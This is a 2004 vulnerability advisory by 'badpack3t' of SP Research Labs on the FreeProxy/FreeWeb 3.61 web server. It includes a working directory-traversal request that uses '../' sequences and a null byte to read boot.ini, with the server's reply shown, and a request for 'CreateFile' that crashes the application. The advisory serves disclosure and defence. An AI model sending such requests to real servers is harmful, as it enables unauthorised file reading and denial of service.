SP Research Labs Advisory x08 ----------------------------- FreeProxy/FreeWeb v3.61 Multiple Vulnerabilities ------------------------------------------------ Vendor Home Page: http://www.alphalink.com.au/~gregr/ Date Released - 1.8.2004 Downloads.com reported 105,607 downloads. ------------------------------------ Product Description from the vendor: FreeProxy is professional Freeware which channels requests for internet pages via a single computer and enables many computers to share an internet connection. If you have dial-up internet access, you can use the Demand Dial or Auto-Dial feature to dial up the internet either when it detects you want to access the internet (demand) or maintain a strict schedule of connection times (auto). Works fast with Cable/Broadband. -------------------- Directory Traversal: A directory traversal vulnerability exists within the webserver part of this product, and not the proxy part of it. Example: -------- C:\>nc 192.168.1.100 80 GET /../../../../../../../boot.ini%00.html HTTP/1.0 HTTP/1.0 200 OK Server: FreeProxy/3.61 Date: Fri, 09 Jan 2004 05:09:15 GMT Content-Type: application/octet-stream Last-Modified: Tue, 04 Nov 2003 16:55:36 GMT Content-Length: 194 [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /fastdetect ------------------ Denial Of Service: When making an HTTP request for a function called 'CreateFile', causes the entire application to crash. Example: -------- C:\>nc 192.168.1.100 80 GET CreateFile HTTP/1.0 **Application Crashes** I get the following error message: Unhandled exception in FreeProxy.exe: 0xC0000005: Access Violation. ----------------------- Tested on WindowsXP SP1 Original Advisory: http://www.security-protocols.com/modules.php?name=News&file=article&sid=1691&mode=&order=0&thold=0 Peace out, ------------------------------ badpack3t www.security-protocols.com ------------------------------